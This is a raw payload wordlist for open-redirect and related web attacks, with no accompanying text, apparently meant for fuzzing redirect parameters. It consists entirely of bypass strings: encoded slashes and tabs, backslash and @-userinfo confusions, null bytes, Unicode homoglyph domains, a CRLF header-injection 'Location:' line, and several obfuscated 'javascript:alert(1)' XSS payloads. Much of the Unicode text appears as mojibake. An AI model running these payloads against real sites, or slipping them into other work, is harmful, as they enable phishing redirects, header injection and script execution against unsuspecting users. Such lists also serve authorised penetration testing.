";alert(0);//
#//localdomain.pw
#//www.google.com
#//â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
%01https://localdomain.pw
%01https://www.google.com
%01https://â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
%09Jav%09ascript:alert(1)
%0A/localdomain.pw
%0A/www.google.com
%0A/â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
%0Aj%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At%0A%3Aalert(1)
%19Jav%09asc%09ript:https%20://www.google.com/%250Aconfirm%25281%2529
%19Jav%09asc%09ript:https%20://www.proviesec.medium.com/%250Aconfirm%25281%2529
%252F@localdomain.pw
%252F@www.google.com
%252F@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
%2f%2e%2e
%68%74%74%70%3a%2f%2f%67%6f%6f%67%6c%65%2e%63%6f%6d
%68%74%74%70%73%3a%2f%2f%6c%6f%63%61%6c%64%6f%6d%61%69%6e%2e%70%77
&%0d%0a1Location:https://google.com
.localdomain.pw
.www.google.com
.â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/#//localdomain.pw
/#//www.google.com
/#//â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/%09/example.com
/%09/example.com@google.com
/%09/google.com
/%09/javascript:alert(1)
/%09/javascript:alert(1);
/%09/localdomain.pw
/%09/www.google.com
/%09/www.google.com@google.com
/%09/www.google.com@www.google.com
/%09/www.google.com@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/%09/www.proviesec.medium.com@localdomain.pw
/%09/www.proviesec.medium.com@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/%09/â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/%2F/localdomain.pw
/%2F/www.google.com
/%2F/â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/%2f%2f%2fbing.com%2f%3fwww.omise.co
/%2f%2fexample.com
/%2f%2fgoogle.com
/%2f%2flocaldomain.pw
/%2f%2fwww.google.com
/%2f%2fâ“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/%2f%5c%2f%67%6f%6f%67%6c%65%2e%63%6f%6d/
/%2f%5c%2f%6c%6f%63%61%6c%64%6f%6d%61%69%6e%2e%70%77/
/%5cexample.com
/%5cexample.com@google.com
/%5cgoogle.com
/%5cjavascript:alert(1)
/%5cjavascript:alert(1);
/%5clocaldomain.pw
/%5cwww.google.com
/%5cwww.google.com@google.com
/%5cwww.google.com@www.google.com
/%5cwww.google.com@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/%5cwww.proviesec.medium.com@localdomain.pw
/%5cwww.proviesec.medium.com@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/%5câ“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/%68%74%74%70%3a%2f%2f%67%6f%6f%67%6c%65%2e%63%6f%6d
/.example.com
/.google.com
/.localdomain.pw
/.www.google.com
/.â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
//%09/example.com
//%09/example.com@google.com
//%09/google.com
//%09/localdomain.pw
//%09/www.google.com
//%09/www.google.com@google.com
//%09/www.google.com@www.google.com
//%09/www.google.com@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
//%09/www.proviesec.medium.com@localdomain.pw
//%09/www.proviesec.medium.com@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
//%09/â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
//%2f%2flocaldomain.pw
//%2f%2fwww.google.com
//%2f%2fâ“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
//%2fxgoogle.com
//%5cexample.com
//%5cexample.com@google.com
//%5cgoogle.com
//%5cjavascript:alert(1)
//%5cjavascript:alert(1);
//%5clocaldomain.pw
//%5cwww.google.com
//%5cwww.google.com@google.com
//%5cwww.google.com@www.google.com
//%5cwww.google.com@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
//%5cwww.proviesec.medium.com@localdomain.pw
//%5cwww.proviesec.medium.com@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
//%5câ“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
//.@.@localdomain.pw
//.@.@www.google.com
//.@.@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
///%09/example.com
///%09/example.com@google.com
///%09/google.com
///%09/localdomain.pw
///%09/www.google.com
///%09/www.google.com@google.com
///%09/www.google.com@www.google.com
///%09/www.google.com@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
///%09/www.proviesec.medium.com@localdomain.pw
///%09/www.proviesec.medium.com@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
///%09/â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
///%5cexample.com
///%5cexample.com@google.com
///%5cgoogle.com
///%5clocaldomain.pw
///%5cwww.google.com
///%5cwww.google.com@google.com
///%5cwww.google.com@www.google.com
///%5cwww.google.com@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
///%5cwww.proviesec.medium.com@localdomain.pw
///%5cwww.proviesec.medium.com@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
///%5câ“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
////%09/example.com
////%09/example.com@google.com
////%09/google.com
////%09/localdomain.pw
////%09/www.google.com
////%09/www.google.com@google.com
////%09/www.google.com@www.google.com
////%09/www.google.com@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
////%09/www.proviesec.medium.com@localdomain.pw
////%09/www.proviesec.medium.com@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
////%09/â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
////%5cexample.com
////%5cexample.com@google.com
////%5cgoogle.com
////%5clocaldomain.pw
////%5cwww.google.com
////%5cwww.google.com@google.com
////%5cwww.google.com@www.google.com
////%5cwww.google.com@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
////%5cwww.proviesec.medium.com@localdomain.pw
////%5cwww.proviesec.medium.com@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
////%5câ“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/////example.com
/////example.com/
/////google.com
/////google.com/
/////localdomain.pw
/////localdomain.pw/
/////www.google.com
/////www.google.com/
/////â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/////â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
////216.58.214.206
////\;@example.com
////example.com/
////example.com/%2e%2e
////example.com/%2e%2e%2f
////example.com/%2f%2e%2e
////example.com/%2f..
////example.com//
////example.com@google.com/
////example.com@google.com/%2e%2e
////example.com@google.com/%2e%2e%2f
////example.com@google.com/%2f%2e%2e
////example.com@google.com/%2f..
////example.com@google.com//
////google.com
////google.com/
////google.com/%2e%2e
////google.com/%2e%2e%2f
////google.com/%2f%2e%2e
////google.com/%2f..
////google.com//
////localdomain.pw/
////localdomain.pw/%2e%2e
////localdomain.pw/%2e%2e%2f
////localdomain.pw/%2f%2e%2e
////localdomain.pw/%2f..
////localdomain.pw//
////localdomainã€‚pw
////www.google.com/
////www.google.com/%2e%2e
////www.google.com/%2e%2e%2f
////www.google.com/%2f%2e%2e
////www.google.com/%2f..
////www.google.com//
////www.google.com@google.com/
////www.google.com@google.com/%2f..
////www.google.com@google.com//
////www.google.com@www.google.com/
////www.google.com@www.google.com/%2e%2e
////www.google.com@www.google.com/%2e%2e%2f
////www.google.com@www.google.com/%2f%2e%2e
////www.google.com@www.google.com/%2f..
////www.google.com@www.google.com//
////www.google.com@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
////www.google.com@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e
////www.google.com@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e%2f
////www.google.com@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
////www.google.com@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f..
////www.google.com@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦//
////www.proviesec.medium.com@localdomain.pw/
////www.proviesec.medium.com@localdomain.pw/%2e%2e
////www.proviesec.medium.com@localdomain.pw/%2e%2e%2f
////www.proviesec.medium.com@localdomain.pw/%2f%2e%2e
////www.proviesec.medium.com@localdomain.pw/%2f..
////www.proviesec.medium.com@localdomain.pw//
////www.proviesec.medium.com@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
////www.proviesec.medium.com@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e
////www.proviesec.medium.com@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e%2f
////www.proviesec.medium.com@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
////www.proviesec.medium.com@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f..
////www.proviesec.medium.com@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦//
////â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒã€‚ï¼°â“¦
////â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
////â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e
////â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e%2f
////â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
////â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f..
////â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦//
///216.58.214.206
///\;@example.com
///\;@google.com
///\;@localdomain.pw
///\;@www.google.com
///\;@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
///\ï¹”@localdomain.pw
///\ï¹”@www.google.com
///\ï¹”@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
///example.com
///example.com/
///example.com/%2e%2e
///example.com/%2e%2e%2f
///example.com/%2f%2e%2e
///example.com/%2f..
///example.com//
///example.com@google.com/
///example.com@google.com/%2e%2e
///example.com@google.com/%2e%2e%2f
///example.com@google.com/%2f%2e%2e
///example.com@google.com/%2f..
///example.com@google.com//
///google.com
///google.com/
///google.com/%2e%2e
///google.com/%2e%2e%2f
///google.com/%2f%2e%2e
///google.com/%2f..
///google.com//
///localdomain.pw
///localdomain.pw/
///localdomain.pw/%2e%2e
///localdomain.pw/%2e%2e%2f
///localdomain.pw/%2f%2e%2e
///localdomain.pw/%2f..
///localdomain.pw//
///www.google.com
///www.google.com/
///www.google.com/%2e%2e
///www.google.com/%2e%2e%2f
///www.google.com/%2f%2e%2e
///www.google.com/%2f..
///www.google.com//
///www.google.com@google.com/
///www.google.com@google.com/%2f..
///www.google.com@google.com//
///www.google.com@www.google.com/
///www.google.com@www.google.com/%2e%2e
///www.google.com@www.google.com/%2e%2e%2f
///www.google.com@www.google.com/%2f%2e%2e
///www.google.com@www.google.com/%2f..
///www.google.com@www.google.com//
///www.google.com@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
///www.google.com@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e
///www.google.com@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e%2f
///www.google.com@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
///www.google.com@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f..
///www.google.com@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦//
///www.proviesec.medium.com@localdomain.pw/
///www.proviesec.medium.com@localdomain.pw/%2e%2e
///www.proviesec.medium.com@localdomain.pw/%2e%2e%2f
///www.proviesec.medium.com@localdomain.pw/%2f%2e%2e
///www.proviesec.medium.com@localdomain.pw/%2f..
///www.proviesec.medium.com@localdomain.pw//
///www.proviesec.medium.com@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
///www.proviesec.medium.com@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e
///www.proviesec.medium.com@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e%2f
///www.proviesec.medium.com@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
///www.proviesec.medium.com@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f..
///www.proviesec.medium.com@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦//
///â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
///â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
///â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e
///â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e%2f
///â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
///â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f..
///â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦//
//216.58.214.206
//3H6k7lIAiqjfNeN@example.com+@google.com/
//3H6k7lIAiqjfNeN@example.com@google.com/
//3H6k7lIAiqjfNeN@www.google.com+@www.google.com/
//3H6k7lIAiqjfNeN@www.google.com+@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
//3H6k7lIAiqjfNeN@www.google.com@www.google.com/
//3H6k7lIAiqjfNeN@www.google.com@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
//3H6k7lIAiqjfNeN@www.google.comâº@www.google.com/
//3H6k7lIAiqjfNeN@www.google.comâº@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
//3H6k7lIAiqjfNeN@www.proviesec.medium.com+@localdomain.pw/
//3H6k7lIAiqjfNeN@www.proviesec.medium.com+@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
//3H6k7lIAiqjfNeN@www.proviesec.medium.com@localdomain.pw/
//3H6k7lIAiqjfNeN@www.proviesec.medium.com@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
//3H6k7lIAiqjfNeN@www.proviesec.medium.comâº@localdomain.pw/
//3H6k7lIAiqjfNeN@www.proviesec.medium.comâº@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
//;@google.com
//;@localdomain.pw
//;@www.google.com
//;@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
//XY>.7d8T\205pZM@example.com+@google.com/
//XY>.7d8T\205pZM@example.com@google.com/
//XY>.7d8T\205pZM@www.google.com+@www.google.com/
//XY>.7d8T\205pZM@www.google.com+@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
//XY>.7d8T\205pZM@www.google.com@www.google.com/
//XY>.7d8T\205pZM@www.google.com@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
//XY>.7d8T\205pZM@www.google.comâº@www.google.com/
//XY>.7d8T\205pZM@www.google.comâº@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
//XY>.7d8T\205pZM@www.proviesec.medium.com+@localdomain.pw/
//XY>.7d8T\205pZM@www.proviesec.medium.com+@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
//XY>.7d8T\205pZM@www.proviesec.medium.com@localdomain.pw/
//XY>.7d8T\205pZM@www.proviesec.medium.com@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
//XY>.7d8T\205pZM@www.proviesec.medium.comâº@localdomain.pw/
//XY>.7d8T\205pZM@www.proviesec.medium.comâº@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
//\/localdomain.pw/
//\/www.google.com/
//\/â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
//example.com
//example.com+&@google.com#+@example.com/
//example.com/
//example.com/%2e%2e
//example.com/%2e%2e%2f
//example.com/%2f%2e%2e
//example.com/%2f..
//example.com//
//example.com@google.com/
//example.com@google.com/%2e%2e%2f
//example.com@google.com/%2f%2e%2e
//example.com@google.com/%2f..
//example.com@google.com//
//example.com@https:///google.com/%2e%2e
//google%00.com
//google%E3%80%82com
//google.com
//google.com/
//google.com/%2E%2E
//google.com/%2F..
//google.com/%2e%2e
//google.com/%2e%2e%2f
//google.com/%2f%2e%2e
//google.com/%2f..
//google.com//
//google.com//%2F%2E%2E
//google.com:80#@example.com/
//google.com:80?@example.com/
//google.com\@example.com
//google.com\@www.google.com
//google.com\texample.com/
//googleã€‚com
//https:///example.com/%2e%2e
//https:///google.com/%2e%2e
//https:///localdomain.pw/%2e%2e
//https:///www.google.com/%2e%2e
//https:///â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e
//https://example.com/%2e%2e%2f
//https://example.com//
//https://example.com@google.com/%2e%2e%2f
//https://example.com@google.com//
//https://google.com/%2e%2e%2f
//https://google.com//
//https://localdomain.pw/%2e%2e%2f
//https://localdomain.pw//
//https://www.google.com/%2e%2e%2f
//https://www.google.com//
//https://www.google.com@google.com//
//https://www.google.com@www.google.com/%2e%2e%2f
//https://www.google.com@www.google.com//
//https://www.google.com@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e%2f
//https://www.google.com@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦//
//https://www.proviesec.medium.com@localdomain.pw/%2e%2e%2f
//https://www.proviesec.medium.com@localdomain.pw//
//https://www.proviesec.medium.com@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e%2f
//https://www.proviesec.medium.com@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦//
//https://â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e%2f
//https://â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦//
//javascript:alert(1)
//javascript:alert(1);
//localdomain%00.pw
//localdomain%E3%80%82pw
//localdomain.pw
//localdomain.pw%23@www.proviesec.medium.com
//localdomain.pw%FF@www.proviesec.medium.com
//localdomain.pw/
//localdomain.pw/%2e%2e%2f
//localdomain.pw/%2f%2e%2e
//localdomain.pw/%2f..
//localdomain.pw//
//localdomain.pw/www.proviesec.medium.com
//localdomain.pw:80#@www.proviesec.medium.com/
//localdomain.pw:80?@www.proviesec.medium.com/
//localdomain.pw?
//localdomain.pw\@.www.proviesec.medium.com
//localdomain.pw\@www.proviesec.medium.com
//localdomain.pw\\@.www.proviesec.medium.com
//localdomain.pw\twww.proviesec.medium.com/
//localdomain.pw\udfff@www.proviesec.medium.com/
//localdomain.pwï¿½@www.proviesec.medium.com/
//localdomainï½¡pw\áµ—www.google.com
//localdomainï½¡pw\áµ—www.proviesec.medium.com
//www.google.com
//www.google.com%23@www.google.com
//www.google.com%FF@www.google.com
//www.google.com+&@www.google.com#+@www.google.com/
//www.google.com+&@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦#+@www.google.com/
//www.google.com/
//www.google.com/%2e%2e%2f
//www.google.com/%2f%2e%2e
//www.google.com/%2f..
//www.google.com/../..%20.www.google.com
//www.google.com/../..%20.â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
//www.google.com//
//www.google.com/www.google.com
//www.google.com:80#@www.google.com/
//www.google.com:80?@www.google.com/
//www.google.com?
//www.google.com@google.com/
//www.google.com@google.com/%2f..
//www.google.com@google.com//
//www.google.com@https:///www.google.com/%2e%2e
//www.google.com@https:///â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e
//www.google.com@www.google.com/
//www.google.com@www.google.com/%2e%2e%2f
//www.google.com@www.google.com/%2f%2e%2e
//www.google.com@www.google.com/%2f..
//www.google.com@www.google.com//
//www.google.com@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
//www.google.com@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e%2f
//www.google.com@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
//www.google.com@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f..
//www.google.com@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦//
//www.google.com\@.www.google.com
//www.google.com\@www.google.com
//www.google.com\\@.www.google.com
//www.google.com\twww.google.com/
//www.google.com\udfff@www.google.com/
//www.google.comâº&@www.google.com#âº@www.google.com/
//www.google.comâº&@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦#âº@www.google.com/
//www.google.comï½¡â‚¨/
//www.google.comï¿½@www.google.com/
//www.proviesec.medium.com+&@localdomain.pw#+@www.proviesec.medium.com/
//www.proviesec.medium.com+&@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦#+@www.proviesec.medium.com/
//www.proviesec.medium.com/../..%20.localdomain.pw
//www.proviesec.medium.com/../..%20.â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
//www.proviesec.medium.com@https:///localdomain.pw/%2e%2e
//www.proviesec.medium.com@https:///â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e
//www.proviesec.medium.com@localdomain.pw/
//www.proviesec.medium.com@localdomain.pw/%2e%2e%2f
//www.proviesec.medium.com@localdomain.pw/%2f%2e%2e
//www.proviesec.medium.com@localdomain.pw/%2f..
//www.proviesec.medium.com@localdomain.pw//
//www.proviesec.medium.com@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
//www.proviesec.medium.com@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e%2f
//www.proviesec.medium.com@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
//www.proviesec.medium.com@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f..
//www.proviesec.medium.com@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦//
//www.proviesec.medium.comâº&@localdomain.pw#âº@www.proviesec.medium.com/
//www.proviesec.medium.comâº&@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦#âº@www.proviesec.medium.com/
//www.proviesec.medium.comï½¡â‚¨/
//â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒ%00ï½¡ï¼°â“¦
//â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒ%E3%80%82pw
//â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
//â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦%23@www.google.com
//â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦%23@www.proviesec.medium.com
//â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦%FF@www.google.com
//â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦%FF@www.proviesec.medium.com
//â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
//â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e%2f
//â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
//â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f..
//â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦//
